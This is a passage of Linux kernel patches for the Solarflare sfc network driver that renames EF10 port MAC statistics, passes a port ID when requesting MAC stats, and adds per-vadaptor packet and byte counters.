EF10_DMA_STAT(rx_15xx_to_jumbo, RX_15XX_TO_JUMBO_PKTS), - EF10_DMA_STAT(rx_gtjumbo, RX_GTJUMBO_PKTS), - EF10_DMA_STAT(rx_bad_gtjumbo, RX_JABBER_PKTS), - EF10_DMA_STAT(rx_overflow, RX_OVERFLOW_PKTS), - EF10_DMA_STAT(rx_align_error, RX_ALIGN_ERROR_PKTS), - EF10_DMA_STAT(rx_length_error, RX_LENGTH_ERROR_PKTS), - EF10_DMA_STAT(rx_nodesc_drops, RX_NODESC_DROPS), + EF10_DMA_STAT(port_tx_bytes, TX_BYTES), + EF10_DMA_STAT(port_tx_packets, TX_PKTS), + EF10_DMA_STAT(port_tx_pause, TX_PAUSE_PKTS), + EF10_DMA_STAT(port_tx_control, TX_CONTROL_PKTS), + EF10_DMA_STAT(port_tx_unicast, TX_UNICAST_PKTS), + EF10_DMA_STAT(port_tx_multicast, TX_MULTICAST_PKTS), + EF10_DMA_STAT(port_tx_broadcast, TX_BROADCAST_PKTS), + EF10_DMA_STAT(port_tx_lt64, TX_LT64_PKTS), + EF10_DMA_STAT(port_tx_64, TX_64_PKTS), + EF10_DMA_STAT(port_tx_65_to_127, TX_65_TO_127_PKTS), + EF10_DMA_STAT(port_tx_128_to_255, TX_128_TO_255_PKTS), + EF10_DMA_STAT(port_tx_256_to_511, TX_256_TO_511_PKTS), + EF10_DMA_STAT(port_tx_512_to_1023, TX_512_TO_1023_PKTS), + EF10_DMA_STAT(port_tx_1024_to_15xx, TX_1024_TO_15XX_PKTS), + EF10_DMA_STAT(port_tx_15xx_to_jumbo, TX_15XX_TO_JUMBO_PKTS), + EF10_DMA_STAT(port_rx_bytes, RX_BYTES), + EF10_DMA_INVIS_STAT(port_rx_bytes_minus_good_bytes, RX_BAD_BYTES), + EF10_OTHER_STAT(port_rx_good_bytes), + EF10_OTHER_STAT(port_rx_bad_bytes), + EF10_DMA_STAT(port_rx_packets, RX_PKTS), + EF10_DMA_STAT(port_rx_good, RX_GOOD_PKTS), + EF10_DMA_STAT(port_rx_bad, RX_BAD_FCS_PKTS), + EF10_DMA_STAT(port_rx_pause, RX_PAUSE_PKTS), + EF10_DMA_STAT(port_rx_control, RX_CONTROL_PKTS), + EF10_DMA_STAT(port_rx_unicast, RX_UNICAST_PKTS), + EF10_DMA_STAT(port_rx_multicast, RX_MULTICAST_PKTS), + EF10_DMA_STAT(port_rx_broadcast, RX_BROADCAST_PKTS), + EF10_DMA_STAT(port_rx_lt64, RX_UNDERSIZE_PKTS), + EF10_DMA_STAT(port_rx_64, RX_64_PKTS), + EF10_DMA_STAT(port_rx_65_to_127, RX_65_TO_127_PKTS), + EF10_DMA_STAT(port_rx_128_to_255, RX_128_TO_255_PKTS), + EF10_DMA_STAT(port_rx_256_to_511, RX_256_TO_511_PKTS), + EF10_DMA_STAT(port_rx_512_to_1023, RX_512_TO_1023_PKTS), + EF10_DMA_STAT(port_rx_1024_to_15xx, RX_1024_TO_15XX_PKTS), + EF10_DMA_STAT(port_rx_15xx_to_jumbo, RX_15XX_TO_JUMBO_PKTS), + EF10_DMA_STAT(port_rx_gtjumbo, RX_GTJUMBO_PKTS), + EF10_DMA_STAT(port_rx_bad_gtjumbo, RX_JABBER_PKTS), + EF10_DMA_STAT(port_rx_overflow, RX_OVERFLOW_PKTS), + EF10_DMA_STAT(port_rx_align_error, RX_ALIGN_ERROR_PKTS), + EF10_DMA_STAT(port_rx_length_error, RX_LENGTH_ERROR_PKTS), + EF10_DMA_STAT(port_rx_nodesc_drops, RX_NODESC_DROPS), GENERIC_SW_STAT(rx_nodesc_trunc), GENERIC_SW_STAT(rx_noskb_drops), - EF10_DMA_STAT(rx_pm_trunc_bb_overflow, PM_TRUNC_BB_OVERFLOW), - EF10_DMA_STAT(rx_pm_discard_bb_overflow, PM_DISCARD_BB_OVERFLOW), - EF10_DMA_STAT(rx_pm_trunc_vfifo_full, PM_TRUNC_VFIFO_FULL), - EF10_DMA_STAT(rx_pm_discard_vfifo_full, PM_DISCARD_VFIFO_FULL), - EF10_DMA_STAT(rx_pm_trunc_qbb, PM_TRUNC_QBB), - EF10_DMA_STAT(rx_pm_discard_qbb, PM_DISCARD_QBB), - EF10_DMA_STAT(rx_pm_discard_mapping, PM_DISCARD_MAPPING), - EF10_DMA_STAT(rx_dp_q_disabled_packets, RXDP_Q_DISABLED_PKTS), - EF10_DMA_STAT(rx_dp_di_dropped_packets, RXDP_DI_DROPPED_PKTS), - EF10_DMA_STAT(rx_dp_streaming_packets, RXDP_STREAMING_PKTS), - EF10_DMA_STAT(rx_dp_hlb_fetch, RXDP_EMERGENCY_FETCH_CONDITIONS), - EF10_DMA_STAT(rx_dp_hlb_wait, RXDP_EMERGENCY_WAIT_CONDITIONS), + EF10_DMA_STAT(port_rx_pm_trunc_bb_overflow, PM_TRUNC_BB_OVERFLOW), + EF10_DMA_STAT(port_rx_pm_discard_bb_overflow, PM_DISCARD_BB_OVERFLOW), + EF10_DMA_STAT(port_rx_pm_trunc_vfifo_full, PM_TRUNC_VFIFO_FULL), + EF10_DMA_STAT(port_rx_pm_discard_vfifo_full, PM_DISCARD_VFIFO_FULL), + EF10_DMA_STAT(port_rx_pm_trunc_qbb, PM_TRUNC_QBB), + EF10_DMA_STAT(port_rx_pm_discard_qbb, PM_DISCARD_QBB), + EF10_DMA_STAT(port_rx_pm_discard_mapping, PM_DISCARD_MAPPING), + EF10_DMA_STAT(port_rx_dp_q_disabled_packets, RXDP_Q_DISABLED_PKTS), + EF10_DMA_STAT(port_rx_dp_di_dropped_packets, RXDP_DI_DROPPED_PKTS), + EF10_DMA_STAT(port_rx_dp_streaming_packets, RXDP_STREAMING_PKTS), + EF10_DMA_STAT(port_rx_dp_hlb_fetch, RXDP_HLB_FETCH_CONDITIONS), + EF10_DMA_STAT(port_rx_dp_hlb_wait, RXDP_HLB_WAIT_CONDITIONS), }; -#define HUNT_COMMON_STAT_MASK ((1ULL << EF10_STAT_tx_bytes) | \ - (1ULL << EF10_STAT_tx_packets) | \ - (1ULL << EF10_STAT_tx_pause) | \ - (1ULL << EF10_STAT_tx_unicast) | \ - (1ULL << EF10_STAT_tx_multicast) | \ - (1ULL << EF10_STAT_tx_broadcast) | \ - (1ULL << EF10_STAT_rx_bytes) | \ - (1ULL << EF10_STAT_rx_bytes_minus_good_bytes) | \ - (1ULL << EF10_STAT_rx_good_bytes) | \ - (1ULL << EF10_STAT_rx_bad_bytes) | \ - (1ULL << EF10_STAT_rx_packets) | \ - (1ULL << EF10_STAT_rx_good) | \ - (1ULL << EF10_STAT_rx_bad) | \ - (1ULL << EF10_STAT_rx_pause) | \ - (1ULL << EF10_STAT_rx_control) | \ - (1ULL << EF10_STAT_rx_unicast) | \ - (1ULL << EF10_STAT_rx_multicast) | \ - (1ULL << EF10_STAT_rx_broadcast) | \ - (1ULL << EF10_STAT_rx_lt64) | \ - (1ULL << EF10_STAT_rx_64) | \ - (1ULL << EF10_STAT_rx_65_to_127) | \ - (1ULL << EF10_STAT_rx_128_to_255) | \ - (1ULL << EF10_STAT_rx_256_to_511) | \ - (1ULL << EF10_STAT_rx_512_to_1023) | \ - (1ULL << EF10_STAT_rx_1024_to_15xx) | \ - (1ULL << EF10_STAT_rx_15xx_to_jumbo) | \ - (1ULL << EF10_STAT_rx_gtjumbo) | \ - (1ULL << EF10_STAT_rx_bad_gtjumbo) | \ - (1ULL << EF10_STAT_rx_overflow) | \ - (1ULL << EF10_STAT_rx_nodesc_drops) | \ +#define HUNT_COMMON_STAT_MASK ((1ULL << EF10_STAT_port_tx_bytes) | \ + (1ULL << EF10_STAT_port_tx_packets) | \ + (1ULL << EF10_STAT_port_tx_pause) | \ + (1ULL << EF10_STAT_port_tx_unicast) | \ + (1ULL << EF10_STAT_port_tx_multicast) | \ + (1ULL << EF10_STAT_port_tx_broadcast) | \ + (1ULL << EF10_STAT_port_rx_bytes) | \ + (1ULL << \ + EF10_STAT_port_rx_bytes_minus_good_bytes) | \ + (1ULL << EF10_STAT_port_rx_good_bytes) | \ + (1ULL << EF10_STAT_port_rx_bad_bytes) | \ + (1ULL << EF10_STAT_port_rx_packets) | \ + (1ULL << EF10_STAT_port_rx_good) | \ + (1ULL << EF10_STAT_port_rx_bad) | \ + (1ULL << EF10_STAT_port_rx_pause) | \ + (1ULL << EF10_STAT_port_rx_control) | \ + (1ULL << EF10_STAT_port_rx_unicast) | \ + (1ULL << EF10_STAT_port_rx_multicast) | \ + (1ULL << EF10_STAT_port_rx_broadcast) | \ + (1ULL << EF10_STAT_port_rx_lt64) | \ + (1ULL << EF10_STAT_port_rx_64) | \ + (1ULL << EF10_STAT_port_rx_65_to_127) | \ + (1ULL << EF10_STAT_port_rx_128_to_255) | \ + (1ULL << EF10_STAT_port_rx_256_to_511) | \ + (1ULL << EF10_STAT_port_rx_512_to_1023) |\ + (1ULL << EF10_STAT_port_rx_1024_to_15xx) |\ + (1ULL << EF10_STAT_port_rx_15xx_to_jumbo) |\ + (1ULL << EF10_STAT_port_rx_gtjumbo) | \ + (1ULL << EF10_STAT_port_rx_bad_gtjumbo) |\ + (1ULL << EF10_STAT_port_rx_overflow) | \ + (1ULL << EF10_STAT_port_rx_nodesc_drops) |\ (1ULL << GENERIC_STAT_rx_nodesc_trunc) | \ (1ULL << GENERIC_STAT_rx_noskb_drops)) @@ -1085,39 +1086,39 @@ static const struct efx_hw_stat_desc efx_ef10_stat_desc[EF10_STAT_COUNT] = { * switchable port we do not expose these because they might not * include all the packets they should. */ -#define HUNT_10G_ONLY_STAT_MASK ((1ULL << EF10_STAT_tx_control) | \ - (1ULL << EF10_STAT_tx_lt64) | \ - (1ULL << EF10_STAT_tx_64) | \ - (1ULL << EF10_STAT_tx_65_to_127) | \ - (1ULL << EF10_STAT_tx_128_to_255) | \ - (1ULL << EF10_STAT_tx_256_to_511) | \ - (1ULL << EF10_STAT_tx_512_to_1023) | \ - (1ULL << EF10_STAT_tx_1024_to_15xx) | \ - (1ULL << EF10_STAT_tx_15xx_to_jumbo)) +#define HUNT_10G_ONLY_STAT_MASK ((1ULL << EF10_STAT_port_tx_control) | \ + (1ULL << EF10_STAT_port_tx_lt64) | \ + (1ULL << EF10_STAT_port_tx_64) | \ + (1ULL << EF10_STAT_port_tx_65_to_127) |\ + (1ULL << EF10_STAT_port_tx_128_to_255) |\ + (1ULL << EF10_STAT_port_tx_256_to_511) |\ + (1ULL << EF10_STAT_port_tx_512_to_1023) |\ + (1ULL << EF10_STAT_port_tx_1024_to_15xx) |\ + (1ULL << EF10_STAT_port_tx_15xx_to_jumbo)) /* These statistics are only provided by the 40G MAC. For a 10G/40G * switchable port we do expose these because the errors will otherwise * be silent. */ -#define HUNT_40G_EXTRA_STAT_MASK ((1ULL << EF10_STAT_rx_align_error) | \ - (1ULL << EF10_STAT_rx_length_error)) +#define HUNT_40G_EXTRA_STAT_MASK ((1ULL << EF10_STAT_port_rx_align_error) |\ + (1ULL << EF10_STAT_port_rx_length_error)) /* These statistics are only provided if the firmware supports the * capability PM_AND_RXDP_COUNTERS. */ #define HUNT_PM_AND_RXDP_STAT_MASK ( \ - (1ULL << EF10_STAT_rx_pm_trunc_bb_overflow) | \ - (1ULL << EF10_STAT_rx_pm_discard_bb_overflow) | \ - (1ULL << EF10_STAT_rx_pm_trunc_vfifo_full) | \ - (1ULL << EF10_STAT_rx_pm_discard_vfifo_full) | \ - (1ULL << EF10_STAT_rx_pm_trunc_qbb) | \ - (1ULL << EF10_STAT_rx_pm_discard_qbb) | \ - (1ULL << EF10_STAT_rx_pm_discard_mapping) | \ - (1ULL << EF10_STAT_rx_dp_q_disabled_packets) | \ - (1ULL << EF10_STAT_rx_dp_di_dropped_packets) | \ - (1ULL << EF10_STAT_rx_dp_streaming_packets) | \ - (1ULL << EF10_STAT_rx_dp_hlb_fetch) | \ - (1ULL << EF10_STAT_rx_dp_hlb_wait)) + (1ULL << EF10_STAT_port_rx_pm_trunc_bb_overflow) | \ + (1ULL << EF10_STAT_port_rx_pm_discard_bb_overflow) | \ + (1ULL << EF10_STAT_port_rx_pm_trunc_vfifo_full) | \ + (1ULL << EF10_STAT_port_rx_pm_discard_vfifo_full) | \ + (1ULL << EF10_STAT_port_rx_pm_trunc_qbb) | \ + (1ULL << EF10_STAT_port_rx_pm_discard_qbb) | \ + (1ULL << EF10_STAT_port_rx_pm_discard_mapping) | \ + (1ULL << EF10_STAT_port_rx_dp_q_disabled_packets) | \ + (1ULL << EF10_STAT_port_rx_dp_di_dropped_packets) | \ + (1ULL << EF10_STAT_port_rx_dp_streaming_packets) | \ + (1ULL << EF10_STAT_port_rx_dp_hlb_fetch) | \ + (1ULL << EF10_STAT_port_rx_dp_hlb_wait)) static u64 efx_ef10_raw_stat_mask(struct efx_nic *efx) { @@ -1183,12 +1184,13 @@ static int efx_ef10_try_update_nic_stats(struct efx_nic *efx) return -EAGAIN; /* Update derived statistics */ - efx_nic_fix_nodesc_drop_stat(efx, &stats[EF10_STAT_rx_nodesc_drops]); - stats[EF10_STAT_rx_good_bytes] = - stats[EF10_STAT_rx_bytes] - - stats[EF10_STAT_rx_bytes_minus_good_bytes]; - efx_update_diff_stat(&stats[EF10_STAT_rx_bad_bytes], - stats[EF10_STAT_rx_bytes_minus_good_bytes]); + efx_nic_fix_nodesc_drop_stat(efx, + &stats[EF10_STAT_port_rx_nodesc_drops]); + stats[EF10_STAT_port_rx_good_bytes] = + stats[EF10_STAT_port_rx_bytes] - + stats[EF10_STAT_port_rx_bytes_minus_good_bytes]; + efx_update_diff_stat(&stats[EF10_STAT_port_rx_bad_bytes], + stats[EF10_STAT_port_rx_bytes_minus_good_bytes]); efx_update_sw_stats(efx, stats); return 0; } @@ -1224,20 +1226,21 @@ static size_t efx_ef10_update_stats(struct efx_nic *efx, u64 *full_stats, } if (core_stats) { - core_stats->rx_packets = stats[EF10_STAT_rx_packets]; - core_stats->tx_packets = stats[EF10_STAT_tx_packets]; - core_stats->rx_bytes = stats[EF10_STAT_rx_bytes]; - core_stats->tx_bytes = stats[EF10_STAT_tx_bytes]; - core_stats->rx_dropped = stats[EF10_STAT_rx_nodesc_drops] + + core_stats->rx_packets = stats[EF10_STAT_port_rx_packets]; + core_stats->tx_packets = stats[EF10_STAT_port_tx_packets]; + core_stats->rx_bytes = stats[EF10_STAT_port_rx_bytes]; + core_stats->tx_bytes = stats[EF10_STAT_port_tx_bytes]; + core_stats->rx_dropped = stats[EF10_STAT_port_rx_nodesc_drops] + stats[GENERIC_STAT_rx_nodesc_trunc] + stats[GENERIC_STAT_rx_noskb_drops]; - core_stats->multicast = stats[EF10_STAT_rx_multicast]; + core_stats->multicast = stats[EF10_STAT_port_rx_multicast]; core_stats->rx_length_errors = - stats[EF10_STAT_rx_gtjumbo] + - stats[EF10_STAT_rx_length_error]; - core_stats->rx_crc_errors = stats[EF10_STAT_rx_bad]; - core_stats->rx_frame_errors = stats[EF10_STAT_rx_align_error]; - core_stats->rx_fifo_errors = stats[EF10_STAT_rx_overflow]; + stats[EF10_STAT_port_rx_gtjumbo] + + stats[EF10_STAT_port_rx_length_error]; + core_stats->rx_crc_errors = stats[EF10_STAT_port_rx_bad]; + core_stats->rx_frame_errors = + stats[EF10_STAT_port_rx_align_error]; + core_stats->rx_fifo_errors = stats[EF10_STAT_port_rx_overflow]; core_stats->rx_errors = (core_stats->rx_length_errors + core_stats->rx_crc_errors + core_stats->rx_frame_errors); @@ -1372,7 +1375,7 @@ static int efx_ef10_mcdi_poll_reboot(struct efx_nic *efx) /* MAC statistics have been cleared on the NIC; clear the local * statistic that we update with efx_update_diff_stat(). */ - nic_data->stats[EF10_STAT_rx_bad_bytes] = 0; + nic_data->stats[EF10_STAT_port_rx_bad_bytes] = 0; return -EIO; } diff --git a/drivers/net/ethernet/sfc/mcdi_pcol.h b/drivers/net/ethernet/sfc/mcdi_pcol.h index 9efdf0a5df64..1e11bb8a95a3 100644 --- a/drivers/net/ethernet/sfc/mcdi_pcol.h +++ b/drivers/net/ethernet/sfc/mcdi_pcol.h @@ -2891,11 +2891,11 @@ /* enum: RXDP counter: Number of times an emergency descriptor fetch was * performed. Valid for EF10 with PM_AND_RXDP_COUNTERS capability only. */ -#define MC_CMD_MAC_RXDP_EMERGENCY_FETCH_CONDITIONS 0x47 +#define MC_CMD_MAC_RXDP_HLB_FETCH_CONDITIONS 0x47 /* enum: RXDP counter: Number of times the DPCPU waited for an existing * descriptor fetch. Valid for EF10 with PM_AND_RXDP_COUNTERS capability only. */ -#define MC_CMD_MAC_RXDP_EMERGENCY_WAIT_CONDITIONS 0x48 +#define MC_CMD_MAC_RXDP_HLB_WAIT_CONDITIONS 0x48 /* enum: Start of GMAC stats buffer space, for Siena only. */ #define MC_CMD_GMAC_DMABUF_START 0x40 /* enum: End of GMAC stats buffer space, for Siena only. */ diff --git a/drivers/net/ethernet/sfc/nic.h b/drivers/net/ethernet/sfc/nic.h index e146e30780a1..8b69a31a0ee4 100644 --- a/drivers/net/ethernet/sfc/nic.h +++ b/drivers/net/ethernet/sfc/nic.h @@ -407,59 +407,59 @@ struct siena_nic_data { }; enum { - EF10_STAT_tx_bytes = GENERIC_STAT_COUNT, - EF10_STAT_tx_packets, - EF10_STAT_tx_pause, - EF10_STAT_tx_control, - EF10_STAT_tx_unicast, - EF10_STAT_tx_multicast, - EF10_STAT_tx_broadcast, - EF10_STAT_tx_lt64, - EF10_STAT_tx_64, - EF10_STAT_tx_65_to_127, - EF10_STAT_tx_128_to_255, - EF10_STAT_tx_256_to_511, - EF10_STAT_tx_512_to_1023, - EF10_STAT_tx_1024_to_15xx, - EF10_STAT_tx_15xx_to_jumbo, - EF10_STAT_rx_bytes, - EF10_STAT_rx_bytes_minus_good_bytes, - EF10_STAT_rx_good_bytes, - EF10_STAT_rx_bad_bytes, - EF10_STAT_rx_packets, - EF10_STAT_rx_good, - EF10_STAT_rx_bad, - EF10_STAT_rx_pause, - EF10_STAT_rx_control, - EF10_STAT_rx_unicast, - EF10_STAT_rx_multicast, - EF10_STAT_rx_broadcast, - EF10_STAT_rx_lt64, - EF10_STAT_rx_64, - EF10_STAT_rx_65_to_127, - EF10_STAT_rx_128_to_255, - EF10_STAT_rx_256_to_511, - EF10_STAT_rx_512_to_1023, - EF10_STAT_rx_1024_to_15xx, - EF10_STAT_rx_15xx_to_jumbo, - EF10_STAT_rx_gtjumbo, - EF10_STAT_rx_bad_gtjumbo, - EF10_STAT_rx_overflow, - EF10_STAT_rx_align_error, - EF10_STAT_rx_length_error, - EF10_STAT_rx_nodesc_drops, - EF10_STAT_rx_pm_trunc_bb_overflow, - EF10_STAT_rx_pm_discard_bb_overflow, - EF10_STAT_rx_pm_trunc_vfifo_full, - EF10_STAT_rx_pm_discard_vfifo_full, - EF10_STAT_rx_pm_trunc_qbb, - EF10_STAT_rx_pm_discard_qbb, - EF10_STAT_rx_pm_discard_mapping, - EF10_STAT_rx_dp_q_disabled_packets, - EF10_STAT_rx_dp_di_dropped_packets, - EF10_STAT_rx_dp_streaming_packets, - EF10_STAT_rx_dp_hlb_fetch, - EF10_STAT_rx_dp_hlb_wait, + EF10_STAT_port_tx_bytes = GENERIC_STAT_COUNT, + EF10_STAT_port_tx_packets, + EF10_STAT_port_tx_pause, + EF10_STAT_port_tx_control, + EF10_STAT_port_tx_unicast, + EF10_STAT_port_tx_multicast, + EF10_STAT_port_tx_broadcast, + EF10_STAT_port_tx_lt64, + EF10_STAT_port_tx_64, + EF10_STAT_port_tx_65_to_127, + EF10_STAT_port_tx_128_to_255, + EF10_STAT_port_tx_256_to_511, + EF10_STAT_port_tx_512_to_1023, + EF10_STAT_port_tx_1024_to_15xx, + EF10_STAT_port_tx_15xx_to_jumbo, + EF10_STAT_port_rx_bytes, + EF10_STAT_port_rx_bytes_minus_good_bytes, + EF10_STAT_port_rx_good_bytes, + EF10_STAT_port_rx_bad_bytes, + EF10_STAT_port_rx_packets, + EF10_STAT_port_rx_good, + EF10_STAT_port_rx_bad, + EF10_STAT_port_rx_pause, + EF10_STAT_port_rx_control, + EF10_STAT_port_rx_unicast, + EF10_STAT_port_rx_multicast, + EF10_STAT_port_rx_broadcast, + EF10_STAT_port_rx_lt64, + EF10_STAT_port_rx_64, + EF10_STAT_port_rx_65_to_127, + EF10_STAT_port_rx_128_to_255, + EF10_STAT_port_rx_256_to_511, + EF10_STAT_port_rx_512_to_1023, + EF10_STAT_port_rx_1024_to_15xx, + EF10_STAT_port_rx_15xx_to_jumbo, + EF10_STAT_port_rx_gtjumbo, + EF10_STAT_port_rx_bad_gtjumbo, + EF10_STAT_port_rx_overflow, + EF10_STAT_port_rx_align_error, + EF10_STAT_port_rx_length_error, + EF10_STAT_port_rx_nodesc_drops, + EF10_STAT_port_rx_pm_trunc_bb_overflow, + EF10_STAT_port_rx_pm_discard_bb_overflow, + EF10_STAT_port_rx_pm_trunc_vfifo_full, + EF10_STAT_port_rx_pm_discard_vfifo_full, + EF10_STAT_port_rx_pm_trunc_qbb, + EF10_STAT_port_rx_pm_discard_qbb, + EF10_STAT_port_rx_pm_discard_mapping, + EF10_STAT_port_rx_dp_q_disabled_packets, + EF10_STAT_port_rx_dp_di_dropped_packets, + EF10_STAT_port_rx_dp_streaming_packets, + EF10_STAT_port_rx_dp_hlb_fetch, + EF10_STAT_port_rx_dp_hlb_wait, EF10_STAT_COUNT }; From 0a2ab4d988d75a42f3997343d1f0a767b9fdec3d Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:38:49 +0100 Subject: [PATCH 605/872] sfc: set the port-id when calling MC_CMD_MAC_STATS The port-id must be known so that the RMON level can be set for the collection of vadapter stats. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/mcdi_port.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/net/ethernet/sfc/mcdi_port.c b/drivers/net/ethernet/sfc/mcdi_port.c index 9bf04cbce20a..fffc34888c02 100644 --- a/drivers/net/ethernet/sfc/mcdi_port.c +++ b/drivers/net/ethernet/sfc/mcdi_port.c @@ -924,6 +924,7 @@ enum efx_stats_action { static int efx_mcdi_mac_stats(struct efx_nic *efx, enum efx_stats_action action, int clear) { + struct efx_ef10_nic_data *nic_data = efx->nic_data; MCDI_DECLARE_BUF(inbuf, MC_CMD_MAC_STATS_IN_LEN); int rc; int change = action == EFX_STATS_PULL ? 0 : 1; @@ -945,6 +946,7 @@ static int efx_mcdi_mac_stats(struct efx_nic *efx, MAC_STATS_IN_PERIODIC_NOEVENT, 1, MAC_STATS_IN_PERIOD_MS, period); MCDI_SET_DWORD(inbuf, MAC_STATS_IN_DMA_LEN, dma_len); + MCDI_SET_DWORD(inbuf, MAC_STATS_IN_PORT_ID, nic_data->vport_id); rc = efx_mcdi_rpc(efx, MC_CMD_MAC_STATS, inbuf, sizeof(inbuf), NULL, 0, NULL); From 3c36a2aded8c9ef06bd09183bd6905f6b55f9886 Mon Sep 17 00:00:00 2001 From: Daniel Pieczko Date: Tue, 2 Jun 2015 11:39:06 +0100 Subject: [PATCH 606/872] sfc: display vadaptor statistics for all interfaces All interfaces will display vadaptor statistics, so set all the relevant bits in the stats bitmask. Only functions with the LINKCTRL flag will see other stats, including (per-port) MAC stats. The vadaptor stats are from rx_unicast to tx_overflow. Signed-off-by: Shradha Shah Signed-off-by: David S. Miller --- drivers/net/ethernet/sfc/ef10.c | 39 +++++++++++++++++++++++++--- drivers/net/ethernet/sfc/mcdi_pcol.h | 20 ++++++++++++++ drivers/net/ethernet/sfc/nic.h | 18 +++++++++++++ 3 files changed, 73 insertions(+), 4 deletions(-) diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c index f44a56a68f3a..3da554f848bc 100644 --- a/drivers/net/ethernet/sfc/ef10.c +++ b/drivers/net/ethernet/sfc/ef10.c @@ -1046,6 +1046,24 @@ static const struct efx_hw_stat_desc efx_ef10_stat_desc[EF10_STAT_COUNT] = { EF10_DMA_STAT(port_rx_dp_streaming_packets, RXDP_STREAMING_PKTS), EF10_DMA_STAT(port_rx_dp_hlb_fetch, RXDP_HLB_FETCH_CONDITIONS), EF10_DMA_STAT(port_rx_dp_hlb_wait, RXDP_HLB_WAIT_CONDITIONS), + EF10_DMA_STAT(rx_unicast, VADAPTER_RX_UNICAST_PACKETS), + EF10_DMA_STAT(rx_unicast_bytes, VADAPTER_RX_UNICAST_BYTES), + EF10_DMA_STAT(rx_multicast, VADAPTER_RX_MULTICAST_PACKETS), + EF10_DMA_STAT(rx_multicast_bytes, VADAPTER_RX_MULTICAST_BYTES), + EF10_DMA_STAT(rx_broadcast, VADAPTER_RX_BROADCAST_PACKETS), + EF10_DMA_STAT(rx_broadcast_bytes, VADAPTER_RX_BROADCAST_BYTES), + EF10_DMA_STAT(rx_bad, VADAPTER_RX_BAD_PACKETS), + EF10_DMA_STAT(rx_bad_bytes, VADAPTER_RX_BAD_BYTES), + EF10_DMA_STAT(rx_overflow, VADAPTER_RX_OVERFLOW), + EF10_DMA_STAT(tx_unicast, VADAPTER_TX_UNICAST_PACKETS), + EF10_DMA_STAT(tx_unicast_bytes, VADAPTER_TX_UNICAST_BYTES), + EF10_DMA_STAT(tx_multicast, VADAPTER_TX_MULTICAST_PACKETS), + EF10_DMA_STAT(tx_multicast_bytes, VADAPTER_TX_MULTICAST_BYTES), + EF10_DMA_STAT(tx_broadcast, VADAPTER_TX_BROADCAST_PACKETS), + EF10_DMA_STAT(tx_broadcast_bytes, VADAPTER_TX_BROADCAST_BYTES), + EF10_DMA_STAT(tx_bad, VADAPTER_TX_BAD_PACKETS), + EF10_DMA_STAT(tx_bad_bytes, VADAPTER_TX_BAD_BYTES), + EF10_DMA_STAT(tx_overflow, VADAPTER_TX_OVERFLOW), }; #define HUNT_COMMON_STAT_MASK ((1ULL << EF10_STAT_port_tx_bytes) | \ @@ -1126,6 +1144,10 @@ static u64 efx_ef10_raw_stat_mask(struct efx_nic *efx) u32 port_caps = efx_mcdi_phy_get_caps(efx); struct efx_ef10_nic_data *nic_data = efx->nic_data; + if (!(efx->mcdi->fn_flags & + 1 << MC_CMD_DRV_ATTACH_EXT_OUT_FLAG_LINKCTRL)) + return 0; + if (port_caps & (1 << MC_CMD_PHY_CAP_40000FDX_LBN)) raw_mask |= HUNT_40G_EXTRA_STAT_MASK; else @@ -1140,13 +1162,22 @@ static u64 efx_ef10_raw_stat_mask(struct efx_nic *efx) static void efx_ef10_get_stat_mask(struct efx_nic *efx, unsigned long *mask) { - u64 raw_mask = efx_ef10_raw_stat_mask(efx); + u64 raw_mask[2]; + + raw_mask[0] = efx_ef10_raw_stat_mask(efx); + + /* All functions see the vadaptor stats */ + raw_mask[0] |= ~((1ULL << EF10_STAT_rx_unicast) - 1); + raw_mask[1] = (1ULL << (EF10_STAT_COUNT - 63)) - 1; #if BITS_PER_LONG == 64 - mask[0] = raw_mask; + mask[0] = raw_mask[0]; + mask[1] = raw_mask[1]; #else - mask[0] = raw_mask & 0xffffffff; - mask[1] = raw_mask >> 32; + mask[0] = raw_mask[0] & 0xffffffff; + mask[1] = raw_mask[0] >> 32; + mask[2] = raw_mask[1] & 0xffffffff; + mask[3] = raw_mask[1] >> 32; #endif } diff --git a/drivers/net/ethernet/sfc/mcdi_pcol.h b/drivers/net/ethernet/sfc/mcdi_pcol.h index 1e11bb8a95a3..0e497b36f53e 100644 --- a/drivers/net/ethernet/sfc/mcdi_pcol.h +++ b/drivers/net/ethernet/sfc/mcdi_pcol.h @@ -2896,6 +2896,26 @@ * descriptor fetch. Valid for EF10 with PM_AND_RXDP_COUNTERS capability only. */ #define MC_CMD_MAC_RXDP_HLB_WAIT_CONDITIONS 0x48 +#define MC_CMD_MAC_VADAPTER_RX_DMABUF_START 0x4c /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_UNICAST_PACKETS 0x4c /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_UNICAST_BYTES 0x4d /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_MULTICAST_PACKETS 0x4e /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_MULTICAST_BYTES 0x4f /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_BROADCAST_PACKETS 0x50 /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_BROADCAST_BYTES 0x51 /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_BAD_PACKETS 0x52 /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_BAD_BYTES 0x53 /* enum */ +#define MC_CMD_MAC_VADAPTER_RX_OVERFLOW 0x54 /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_DMABUF_START 0x57 /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_UNICAST_PACKETS 0x57 /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_UNICAST_BYTES 0x58 /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_MULTICAST_PACKETS 0x59 /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_MULTICAST_BYTES 0x5a /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_BROADCAST_PACKETS 0x5b /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_BROADCAST_BYTES 0x5c /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_BAD_PACKETS 0x5d /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_BAD_BYTES 0x5e /* enum */ +#define MC_CMD_MAC_VADAPTER_TX_OVERFLOW 0x5f /* enum */ /* enum: Start of GMAC stats buffer space, for Siena only. */ #define MC_CMD_GMAC_DMABUF_START 0x40 /* enum: End of GMAC stats buffer space, for Siena only. */ diff --git 